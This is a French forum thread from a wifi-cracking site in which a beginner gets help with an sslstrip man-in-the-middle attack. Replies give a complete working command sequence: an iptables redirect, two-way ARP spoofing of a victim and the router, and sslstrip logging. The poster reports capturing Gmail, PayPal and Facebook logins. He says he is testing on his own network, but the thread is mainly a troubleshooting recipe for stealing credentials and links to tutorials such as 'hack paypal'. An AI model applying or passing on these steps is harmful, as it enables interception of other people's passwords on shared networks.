Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 17-03-2010 16:31:53

Hyoga
Membre
Inscription : 17-03-2010
Messages : 11

probleme log sslstrip

Bonjour,

débutant dans le domaine, je recontre un petit problème avec l'utilisation de sslstrip.

Tout d'abord, je n'utilise pas backtrack mais ubuntu jaunty sur lequel j'ai installé les logiciels qui me sont utiles.

J'utilise la chose sur un portable avec un chipset wifi intel 3945 (la carte qui va bien doit arriver demain normalement smile )

Je fais mes tests sur mon propre réseau qui est en WPA2

Le PC "victime" est mon fixe qui est connecté en filaire au routeur et le PC "attaquant" est donc mon portable connecté en wifi.

J'utilise la méthode suivante avec sslstrip 0.7 (celle du tuto en gros) :

ip_forward est bien à 1.

ip routeur : 192.168.0.1

ip victime : 192.168.0.15

Je me place dans le répertoire de sslstrip 0.7

[c]sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000[/c]

[c]sudo arpspoof -i wlan0 -t 192.168.0.15 192.168.0.1[/c]

Dans un autre terminal :

[c]sudo python sslstrip.py -w lg.txt -a - 10000 -f[/c]

Ca semble fonctionner, le surf sur le pc victime est plus lent mais fonctionne, le fichier log.txt gonfle en taille mais quand je veux le lire, gedit me dit qu'il n'a pas réussi à déterminer le codage de caractère et ne peut donc pas afficher le contenu.

Je tente d'accéder à ma messagerie gmail, mon compte paypal, mon compte facebook (je précise au cas où ça aurait de l'importance).

Quelqu'un pourrait-il m'aider ? Car là j'avoue que je coince.

Merci d'avance

Dernière modification par Hyoga (17-03-2010 16:32:27)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 18-03-2010 09:58:49

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : probleme log sslstrip

Salut Hyoga, et bienvenue sur le forum ! smile

A priori, toute ta démarche est bonne (sauf peut-être l'ARPspoof que je ferais dans les 2 sens personnellement, mais soit), donc tu ne devrais pas avoir de problème hmm Essaie un peu, en console et dans le répertoire du fichier log, de taper "[c]cat log.txt[/c]" ou même "[c]less log.txt[/c]", histoire de voir si c'est vraiment un problème d'encodage ? Si tu sais y lire les infos comme ca, alors le codage est bon.

Moi je pense plutôt que Gedit est pas content de devoir accéder à un fichier qui est en cours d'utilisation/écriture : comme SSLStrip continue à le remplir pendant que tu essaies de l'ouvrir, Gedit se demande ce qui se passe et il râle. Donc tu peux essayer de l'ouvrir après avoir coupé SSLStrip (CTRL+Z) smile

Au passage, avec l'option "-a" tu risques d'avoir énormément d'infos dans le fichier en question, si tu veux juste les login/passwords, tu peux enlever l'option "-a" et garder le réglage par défaut. Les différents réglages possibles sont détaillés dans l'aide wink

Hors Ligne

#3 18-03-2010 18:06:35

Hyoga
Membre
Inscription : 17-03-2010
Messages : 11

Re : probleme log sslstrip

Salut,

aujourd'hui, avec la nouvelle carte alfa, je n'ai pas rencontré le problème mais ça ne fonctionne pas mieux.

Avec le changement de table ip, le ettercap pour le mitn, le arpspoof (même dans les deux sens) et sslstrip, ça me bloque la connexion et dans le log sslstrip, je ne vois rien apparaître d'intéressant.

Puis-je me passer du arpspoof ?

Hors Ligne

#4 18-03-2010 19:38:21

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : probleme log sslstrip

Tu n'a pas besoin d'utiliser arpspoof ET ettercap puisque les deux servent à te mettre en mitm ;-)

Sinon tu a essayé de faire ce que antares t'as proposé ?

cat fichier.txt

Sharkoff

Hors Ligne

#5 19-03-2010 00:24:40

Hyoga
Membre
Inscription : 17-03-2010
Messages : 11

Re : probleme log sslstrip

Squaks a écrit :

Tu n'a pas besoin d'utiliser arpspoof ET ettercap puisque les deux servent à te mettre en mitm ;-)

Sinon tu a essayé de faire ce que antares t'as proposé ?

cat fichier.txt

C'est bien ce que je pensais mais j'avais lu des avis parfois contraire sur le forum.

Donc :

[c]sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000[/c]

[c]sudo arpspoof -i wlan4 -t 192.168.0.15 192.168.0.1[/c]

[c]sudo python sslstrip.py -p -w ssl.txt[/c]

[c]sudo ettercap -T -q -i wlan4[/c]

Comme trouvé dans le tuto sur le blog de benjy

et enfin

[c]cat ssl.txt[/c]

Et j'arrive à récupérer mes mdp smile

Le surf est très lent, parfois ça donne page blanche mais les login et mot de passe se retrouvent bien dans le fichier texte.

J'ai cepndant du mal à comprendre pourquoi avec ettercap en mitm, ça ne fonctionne pas.

Maintenant, j'ai d'autres questions en ce qui concerne msgsnarf et webspy entre autre, si j'ai bien compris la régle, je dois faire un autre topic ? big_smile

Merci pour votre aide smile

Hors Ligne

#6 19-03-2010 00:30:14

Hyoga
Membre
Inscription : 17-03-2010
Messages : 11

Re : probleme log sslstrip

Après test, la dernière partie sur ettercap n'est pas indispensable et le surf s'en trouve moins ralenti

Hors Ligne

#7 19-03-2010 00:37:23

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : probleme log sslstrip

+1 pour Squaks, pas besoin d'Ettercap et Arpspoof en même temps... Mais bon, tant mieux si tu y es arrivé comme ca smile

Pour le surf lent, oui, c'est effectivement ce que j'ai constaté avec Ettercap (mais en version graphique, pas console). C'est pour ca que je préfère le remplacer par Arpspoof tout seul. Je n'ai pas de BT sous la main pour l'instant, mais tu peux essayer ceci :

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sudo arpspoof -i wlan4 -t 192.168.0.15 192.168.0.1
sudo arpspoof -i wlan4 -t 192.168.0.1 192.168.0.15
sudo python sslstrip.py -p -w ssl.txt
cat ssl.txt

Le double arpspoof n'est pas une erreur, si tu regardes bien j'ai inversé les adresse wink La première ligne sert à faire croire à la station que tu es le routeur, et la deuxième ligne sert à faire croire au routeur que tu es la station. Ainsi, tu te retrouves exactement au milieu, et tout ce qui passe dans 1 sens ou dans l'autre passe d'office par chez toi. Dans cette configuration, tu peux oublier Ettercap (d'ailleurs je ne vois pas trop à quoi il sert dans tes commandes, les options utilisées ne correspondent pas à une attaque hmm).
Essaie ca et tu verras si c'est plus rapide smile

Pour plus d'infos sur le problème (que tu n'es pas le premier à avoir wink), tu peux aller voir ce topic --> ettercap ng: seuls les login/pass des boites mails sont décryptés
Tu as aussi les tutos "maison" :
- Celui de M1ck3y : Utilisation de Sslstrip pour une attaque man in the middle sur du https (SSL), arpspoof et hack paypal
- Celui de [email protected] : TUTO BT4 final SSLSTRIP (Bonus. ARP Poisoning + DNS Spoof + httpd)

Hors Ligne

#8 22-03-2010 01:14:58

Hyoga
Membre
Inscription : 17-03-2010
Messages : 11

Re : probleme log sslstrip

Oups, je n'avais pas vu, j'avoue qu'avec arpspoof, le fonctionnement est assez aléatoire.

Je me met en mitm avec ettercap en ligne de commande car j'en ai marre qu'il se ferme à la détection des hosts et ça roule smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
4 222 04-12-2016 16:20:59 par pwerrick
Problème reaver par Antho3674
4 314 15-11-2016 22:05:12 par kcdtv
3 344 14-08-2016 10:22:07 par MiscL
5 739 18-07-2016 23:13:58 par kcdtv
5 1866 13-07-2016 15:56:51 par jaues007

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.031 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]